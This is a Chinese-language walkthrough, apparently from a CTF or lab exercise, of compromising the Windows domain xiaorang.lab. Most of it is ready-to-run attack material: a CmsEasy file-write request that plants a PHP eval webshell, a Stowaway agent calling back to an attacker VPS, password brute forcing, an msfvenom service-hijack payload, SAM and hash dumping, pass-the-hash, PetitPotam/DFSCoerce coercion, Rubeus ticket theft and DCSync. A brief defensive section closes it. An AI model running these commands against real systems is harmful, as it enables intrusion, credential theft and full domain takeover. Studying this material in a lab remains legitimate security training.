域渗透委派攻击实战教学文档<\/strong><\/p>

一、环境概述<\/strong><\/h3>

目标网络<\/strong>：域 xiaorang.lab<\/code>，包含域控（DC01）、文件服务器（FILESERVER）、成员服务器（WIN19）等。<\/li>
攻击起点<\/strong>：外网Web服务器（39.101.135.175）存在CmsEasy漏洞，通过漏洞获取内网跳板机权限。<\/li>
代理工具<\/strong>：Stowaway（用于搭建内网代理通道）。<\/li>
关键攻击路径<\/strong>：外网打点 → 内网横向移动 → 非约束委派利用 → 域控权限获取。<\/li> <\/ul> 二、外网打点<\/strong><\/h3> 1. 信息收集<\/strong><\/h4> 使用fscan<\/code>扫描外网IP，发现开放端口：21（FTP）<\/code>、22（SSH）<\/code>、80（HTTP）<\/code>、3306（MySQL）<\/code>。<\/li> Web应用为CmsEasy v7.7.5<\/strong>，存在已知漏洞（CVE-2021-42643）。<\/li> <\/ul> 2. 漏洞利用<\/strong><\/h4> 漏洞原理<\/strong>：CmsEasy的模板管理功能存在任意文件写入，可上传Webshell。<\/li> 利用步骤<\/strong>：通过弱口令admin:123456<\/code>登录后台（\/admin<\/code>）。<\/li> 发送POST请求写入Webshell： POST<\/span> \/index.php?case=template&act=save&admin_dir=admin&site=default HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> 39.101.135.175<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span>Content-Length:<\/span> 121<\/span> <\/span><\/span> <\/span><\/span>sid=#data_d_.._d_.._d_.._d_shell.php&slen=693&scontent=<?php @eval($_POST[1]);?> <\/span><\/span><\/code><\/pre><\/li> 使用蚁剑连接Webshell，获取跳板机（172.22.4.36）权限。<\/li> <\/ol> <\/li> <\/ul> 3. 权限提升<\/strong><\/h4> 查找SUID权限文件：find \/ -perm -u=s -type f 2>\/dev\/null<\/code>。<\/li> 利用diff<\/code>命令读取flag： diff --line-format=<\/span>%L \/dev\/null \/home\/flag\/flag01.txt <\/span><\/span><\/code><\/pre> 获取提示信息：用户名rock<\/code>（后续用于内网爆破）。<\/li> <\/ul> <\/li> <\/ul> 三、内网代理搭建<\/strong><\/h3> 1. 代理配置<\/strong><\/h4> 攻击机（VPS）<\/strong>：运行Stowaway服务端： .\/admin -s 1234<\/span> -l 1234<\/span> <\/span><\/span><\/code><\/pre><\/li> 跳板机<\/strong>：上传Stowaway客户端并连接： .\/agent -c <VPS_IP>:1234 -s 1234<\/span> <\/span><\/span><\/code><\/pre><\/li> 本地代理设置<\/strong>：修改\/etc\/proxychains4.conf<\/code>，添加代理规则： socks5 <VPS_IP> 1234 <\/code><\/pre> <\/li> 使用Proxifier或proxychains4<\/code>代理工具流量。<\/li> <\/ul> <\/li> <\/ul> 四、内网信息收集<\/strong><\/h3> 1. 网络扫描<\/strong><\/h4> 使用fscan<\/code>扫描内网段（172.22.4.0\/24），发现关键主机： 172.22.4.7<\/code>：域控DC01（Windows Server 2016）。<\/li> 172.22.4.19<\/code>：文件服务器FILESERVER。<\/li> 172.22.4.45<\/code>：成员服务器WIN19（用户Adrian<\/code>）。<\/li> <\/ul> <\/li> <\/ul> 2. 密码爆破<\/strong><\/h4> 针对WIN19（172.22.4.45）的RDP\/SMB服务爆破： Hydra爆破RDP<\/strong>： proxychains4 hydra 172.22.4.45 rdp -l Adrian -P \/usr\/share\/wordlists\/rockyou.txt <\/span><\/span><\/code><\/pre><\/li> CrackMapExec爆破SMB<\/strong>： proxychains4 crackmapexec smb 172.22.4.45 -u Adrian -P rockyou.txt --local-auth <\/span><\/span><\/code><\/pre><\/li> 结果<\/strong>：密码babygirl1<\/code>，但已过期需修改。<\/li> <\/ul> <\/li> <\/ul> 3. 密码修改<\/strong><\/h4> 使用rdesktop<\/code>连接WIN19的RDP，手动修改密码为Admin123.<\/code>。<\/li> <\/ul> 五、权限提升（WIN19）<\/strong><\/h3> 1. 服务劫持<\/strong><\/h4> 发现服务gupdate<\/code>以System权限运行，且普通用户可修改其注册表路径。<\/li> 利用步骤<\/strong>：生成恶意服务程序： msfvenom -p windows\/x64\/exec cmd=<\/span>'reg save hklm\system C:\Users\Adrian\Desktop\system'<\/span> -f exe-service -o sam.exe <\/span><\/span><\/code><\/pre><\/li> 修改服务注册表路径： reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate"<\/span> \/v ImagePath \/t REG_EXPAND_SZ \/d "C:\Users\Adrian\Desktop\sam.exe"<\/span> <\/span><\/span><\/code><\/pre><\/li> 启动服务导出SAM\/SYSTEM文件： sc start gupdate <\/span><\/span><\/code><\/pre><\/li> <\/ol> <\/li> <\/ul> 2. 哈希提取<\/strong><\/h4> 使用impacket-secretsdump<\/code>解析SAM文件： impacket-secretsdump LOCAL -sam sam -system system -security security <\/span><\/span><\/code><\/pre> 获取本地Administrator哈希：ba21c629d9fd56aff10c3e826323e6ab<\/code>。<\/li> 获取机器账户（WIN19$）哈希：fec226afd3e779082bc1e7309363cb7c<\/code>。<\/li> <\/ul> <\/li> <\/ul> 3. 哈希传递<\/strong><\/h4> 通过Psexec登录WIN19的Administrator： proxychains4 impacket-psexec administrator@172.22.4.45 -hashes aad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab <\/span><\/span><\/code><\/pre><\/li> <\/ul> 六、非约束委派攻击<\/strong><\/h3> 1. BloodHound信息收集<\/strong><\/h4> 使用机器账户哈希收集域内关系： proxychains4 bloodhound-python -u win19$ --hashes aad3b435b51404ee:fec226afd3e779082bc1e7309363cb7c -d xiaorang.lab -dc dc01.xiaorang.lab -c all <\/span><\/span><\/code><\/pre> 发现WIN19配置了非约束委派<\/strong>，可捕获域控的TGT票据。<\/li> <\/ul> <\/li> <\/ul> 2. 强制身份验证触发<\/strong><\/h4> 方法1：DFSCoerce<\/strong> proxychains4 python3 dfscoerce.py -u win19$ -hashes :fec226afd3e779082bc1e7309363cb7c -d xiaorang.lab win19 172.22.4.7 <\/span><\/span><\/code><\/pre><\/li> 方法2：PetitPotam<\/strong> proxychains4 python3 PetitPotam.py -u WIN19$ -hashes :fec226afd3e779082bc1e7309363cb7c -dc-ip 172.22.4.7 WIN19 172.22.4.7 <\/span><\/span><\/code><\/pre><\/li> <\/ul> 3. 票据捕获与利用<\/strong><\/h4> 在WIN19上使用Rubeus监控DC01的TGT： Rubeus.exe monitor \/interval:1 \/targetuser:DC01$ <\/span><\/span><\/code><\/pre><\/li> 获取Base64编码的TGT后，导入内存： Rubeus.exe ptt \/ticket:<BASE64_TICKET> <\/span><\/span><\/code><\/pre><\/li> 或使用mimikatz导入： kerberos::ptt dc.kirbi <\/span><\/span><\/code><\/pre><\/li> <\/ul> 4. 域控哈希提取<\/strong><\/h4> 通过DCSync攻击获取域管理员哈希： mimikatz.exe "lsadump::dcsync \/domain:xiaorang.lab \/user:administrator"<\/span> <\/span><\/span><\/code><\/pre> 结果：4889f6553239ace1f7c47fa2c619c252<\/code>。<\/li> <\/ul> <\/li> <\/ul> 七、横向移动<\/strong><\/h3> 使用域管理员哈希访问文件服务器（172.22.4.19）： proxychains4 impacket-wmiexec -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab\/Administrator@172.22.4.19 <\/span><\/span><\/code><\/pre><\/li> 登录域控（172.22.4.7）： proxychains4 impacket-wmiexec -hashes :4889f6553239ace1f7c47fa2c619c252 administrator@172.22.4.7 <\/span><\/span><\/code><\/pre><\/li> <\/ul> 八、防御建议<\/strong><\/h3> 限制委派配置<\/strong>：避免使用非约束委派，改用约束委派或基于资源的约束委派。<\/li> 服务权限管控<\/strong>：禁止普通用户修改高权限服务的注册表路径。<\/li> 网络隔离<\/strong>：严格划分网络区域，限制内网服务的暴露面。<\/li> 监控与检测<\/strong>：启用Kerberos日志审计，监控异常票据请求行为。<\/li> <\/ol> 总结<\/strong>：本案例通过外网漏洞切入内网，利用服务权限提升、非约束委派和强制认证漏洞，最终实现域控权限获取。关键点在于委派配置的滥用和票据传递攻击。<\/p>